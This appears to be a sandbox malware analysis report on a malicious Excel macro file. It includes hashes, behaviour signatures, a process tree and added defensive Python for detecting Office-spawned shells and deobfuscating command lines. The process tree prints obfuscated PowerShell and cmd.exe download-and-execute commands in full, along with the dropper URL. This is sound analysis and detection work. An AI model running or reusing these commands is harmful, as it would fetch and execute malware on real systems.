Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    31/12/2023, 06:37

General

  • Target

    2be7123060d0a3294b6fabff5553da30.xlsm

  • Size

    13KB

  • MD5

    2be7123060d0a3294b6fabff5553da30

  • SHA1

    a62e852b641ff566c41ef49ffb60b2cff377acdc

  • SHA256

    691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f

  • SHA512

    d5fdf9eef61e3f498f268285870b38c679b9f692f5ac74b269688a20691da8c660c35dcb05f1ff3b6e3e2c30d4b39dc983ce71dc0d32b168d1b1a998ff750856

  • SSDEEP

    192:cACGFE7x59/+OaFUlbVvevUqzvBh98CmU4Y/q49UFMuC3l18+wc+X:RFLUlM9zph98bU4Oyuuof8ke

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper: http://iurl.vip/3osyi

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
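
The "Process spawned unexpected child process" signature fires on the two children of EXCEL.EXE in the process tree below. An Office application has no normal reason to launch a shell or script host, and keying the check on the whole ancestor chain rather than only the direct parent also catches a powershell.exe that is one hop further away behind an intermediate cmd.exe. The following Python is an added example, not tria.ge's signature logic: it builds a process tree from creation events constructed to match the Processes section of this report. The parent of PID 2224 is an assumption (the report lists that process at top level), and the explorer.exe and "cmd /c dir" events are benign controls that must not fire.

```python
"""Flag shells and script hosts whose ancestry leads back to an Office application.

Added example, not tria.ge's signature code. EVENTS is constructed from the
Processes section of this report: the parent of PID 2224 is an assumption (the
report lists it at top level), and PIDs 1000 and 3100 are benign controls.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe"}
# Children an Office process has no normal reason to launch.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                       "certutil.exe", "bitsadmin.exe", "msiexec.exe", "schtasks.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 500, r"C:\Windows\explorer.exe", "explorer.exe"),  # benign control
    ProcEvent(2948, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde '
              r"C:\Users\Admin\AppData\Local\Temp\2be7123060d0a3294b6fabff5553da30.xlsm"),
    ProcEvent(2284, 2948, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile')"
              r".Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')"),
    ProcEvent(2268, 2948, r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe"),
    # ppid 2268 is an assumption; the report shows this process at top level.
    ProcEvent(2224, 2268, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\DoFPS.exe"),
    ProcEvent(3100, 1000, r"C:\Windows\System32\cmd.exe", "cmd /c dir"),  # benign control
]


def basename(path: str) -> str:
    """Lower-cased image file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
                    max_hops: int = 5) -> Optional[Tuple[int, int]]:
    """Return (office_pid, hops) if an Office process sits within max_hops
    parents of ev, else None. Walking the chain rather than checking only the
    direct parent is what catches powershell.exe launched through cmd.exe."""
    cur, hops = by_pid.get(ev.ppid), 1
    while cur is not None and hops <= max_hops:
        if basename(cur.image) in OFFICE_IMAGES:
            return cur.pid, hops
        cur, hops = by_pid.get(cur.ppid), hops + 1
    return None


def find_office_spawned_children(events: List[ProcEvent]) -> List[Tuple[int, str, int, int]]:
    """(child_pid, child_image, office_pid, hops) for every suspicious child."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) not in SUSPICIOUS_CHILDREN:
            continue
        found = office_ancestor(ev, by_pid)
        if found is not None:
            hits.append((ev.pid, basename(ev.image), found[0], found[1]))
    return hits


if __name__ == "__main__":
    for pid, image, office_pid, hops in find_office_spawned_children(EVENTS):
        print(f"PID {pid} ({image}) descends from Office PID {office_pid}, {hops} hop(s) away")
```

Against the constructed events this reports PIDs 2284 and 2268 one hop from EXCEL.EXE and PID 2224 two hops away, while the benign cmd.exe under explorer.exe stays silent. The hop count is worth keeping in the alert: a rule that only compares the direct parent would see cmd.exe for PID 2224 and miss it.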

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2be7123060d0a3294b6fabff5553da30.xlsm
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2268
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\DoFPS.exe
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2224
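
The two command lines under PID 2948 use different obfuscation layers. cmd.exe treats ^ as an escape and drops it (outside double quotes) before creating the child, so p^o^w^e^r^s^h^e^l^l.e^xe launches a plain powershell.exe; PowerShell resolves the split string ('Down'+'loadFile') and the dynamic member access .('...') back to .DownloadFile at run time. The command line recorded for PID 2224 is exactly what the PID 2268 line becomes after caret stripping and %Temp% expansion, and the 10-second Start-Sleep gives the first powershell.exe time to finish the download before the dropped DoFPS.exe is run. The following Python is an added example, not tria.ge's config extractor: it reverses both layers on the report's two command lines and pulls out the URL, drop path, sleep delay and hidden-window flag. Only the %Temp% value is taken from the report (the resolved path shown for PID 2224); the function names and regular expressions are this example's own.

```python
"""Reverse the cmd.exe and PowerShell obfuscation in this report's command lines
and pull out the indicators. Added example, not tria.ge's config extractor.
Only SANDBOX_ENV comes from the report (the resolved %Temp% path shown for
PID 2224); the function names and regexes are this example's own.
"""
import re
from typing import Dict

SANDBOX_ENV = {"temp": r"C:\Users\Admin\AppData\Local\Temp"}


def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe drops a lone ^ and passes the next character through literally
    (so ^^ becomes ^); inside double quotes ^ is kept. This is what turns
    p^o^w^e^r^s^h^e^l^l.e^xe into powershell.exe before the child is created."""
    out, in_quote, i = [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quote = not in_quote
        elif c == "^" and not in_quote and i + 1 < len(cmdline):
            i += 1
            c = cmdline[i]
        out.append(c)
        i += 1
    return "".join(out)


def expand_env(cmdline: str) -> str:
    """Resolve %VAR% (cmd) and $env:VAR (PowerShell) against the sandbox values;
    unknown variables are left untouched so nothing is invented."""
    def cmd_var(m):
        return SANDBOX_ENV.get(m.group(1).lower(), m.group(0))

    def ps_var(m):
        val = SANDBOX_ENV.get(m.group(1).lower())
        return "'" + val + "'" if val is not None else m.group(0)

    cmdline = re.sub(r"%(\w+)%", cmd_var, cmdline)
    return re.sub(r"\$env:(\w+)", ps_var, cmdline, flags=re.I)


def fold_ps_strings(cmdline: str) -> str:
    """Join 'a'+'b' literal concatenations (repeatedly, for longer chains) and
    rewrite dynamic member access .('Name') as .Name, which is how PowerShell
    resolves ('Down'+'loadFile') to DownloadFile at run time."""
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        folded = concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmdline)
        if folded == cmdline:
            break
        cmdline = folded
    return re.sub(r"\.\(\s*'([A-Za-z_]\w*)'\s*\)", r".\1", cmdline)


def is_cmd_launch(cmdline: str) -> bool:
    return re.match(r'\s*"?(?:[^\s"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\b', cmdline, re.I) is not None


def deobfuscate(cmdline: str) -> str:
    if is_cmd_launch(cmdline):          # caret escaping is a cmd.exe feature only
        cmdline = strip_cmd_carets(cmdline)
    return fold_ps_strings(expand_env(cmdline))


URL_RE = re.compile(r"""https?://[^\s'"(),;]+""", re.I)
PATH_RE = re.compile(r"""[A-Za-z]:\\[^\s'"(),;]+""")
SLEEP_RE = re.compile(r"Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)  # -w 1 is -WindowStyle Hidden


def extract_iocs(cmdline: str) -> Dict[str, object]:
    clean = deobfuscate(cmdline)
    return {
        "deobfuscated": clean,
        "urls": URL_RE.findall(clean),
        "paths": PATH_RE.findall(clean),
        "sleep_seconds": [int(s) for s in SLEEP_RE.findall(clean)],
        "hidden_window": HIDDEN_RE.search(clean) is not None,
    }


# Command lines copied from the Processes section (PIDs 2284 and 2268).
REPORT_CMDLINES = [
    r"powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')",
    r"cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe",
]

if __name__ == "__main__":
    for line in REPORT_CMDLINES:
        print(extract_iocs(line))
```

Run on the two report lines this yields the URL http://iurl.vip/3osyi and the drop path C:\Users\Admin\AppData\Local\Temp\DoFPS.exe from the first, and from the second the same drop path, a 10-second delay and a hidden window, with the deobfuscated second line matching what the report recorded for PID 2224 apart from the leading "cmd /c". Case-mangled cmdlet and type names (nEw-oBjecT, Net.WebcLIENt) are left as they are; PowerShell is case-insensitive, so matching rules should be too.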

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    fb73569cb6a65a0db617f9022ef2d740

    SHA1

    ab37da4db35c544253853655c09e6d335bd165ab

    SHA256

    e4d8625335d8d360665979a2999f48d1a07192ee118598a92ba33697cccf2a56

    SHA512

    cadc1a0a6d91d9bf45f5f622ec3dcb7788dcf9ac0c2096f73078e3d4415e3f29d7e8afaea6452cc6c130f8cea6a81899c046c18979d876d559a9ddc170434ba4

  • memory/2224-10-0x000000006C6D0000-0x000000006CC7B000-memory.dmp (Filesize 5.7MB)
  • memory/2224-20-0x000000006C6D0000-0x000000006CC7B000-memory.dmp (Filesize 5.7MB)
  • memory/2224-15-0x0000000001D20000-0x0000000001D60000-memory.dmp (Filesize 256KB)
  • memory/2224-16-0x0000000001D20000-0x0000000001D60000-memory.dmp (Filesize 256KB)
  • memory/2224-13-0x000000006C6D0000-0x000000006CC7B000-memory.dmp (Filesize 5.7MB)
  • memory/2224-11-0x0000000001D20000-0x0000000001D60000-memory.dmp (Filesize 256KB)
  • memory/2284-17-0x0000000002CA0000-0x0000000002CE0000-memory.dmp (Filesize 256KB)
  • memory/2284-18-0x0000000002CA0000-0x0000000002CE0000-memory.dmp (Filesize 256KB)
  • memory/2284-12-0x0000000002CA0000-0x0000000002CE0000-memory.dmp (Filesize 256KB)
  • memory/2284-9-0x000000006C6D0000-0x000000006CC7B000-memory.dmp (Filesize 5.7MB)
  • memory/2284-14-0x000000006C6D0000-0x000000006CC7B000-memory.dmp (Filesize 5.7MB)
  • memory/2284-19-0x000000006C6D0000-0x000000006CC7B000-memory.dmp (Filesize 5.7MB)
  • memory/2948-0-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize 64KB)
  • memory/2948-1-0x00000000727AD000-0x00000000727B8000-memory.dmp (Filesize 44KB)
  • memory/2948-21-0x00000000727AD000-0x00000000727B8000-memory.dmp (Filesize 44KB)
  • memory/2948-23-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize 64KB)
  • memory/2948-24-0x00000000727AD000-0x00000000727B8000-memory.dmp (Filesize 44KB)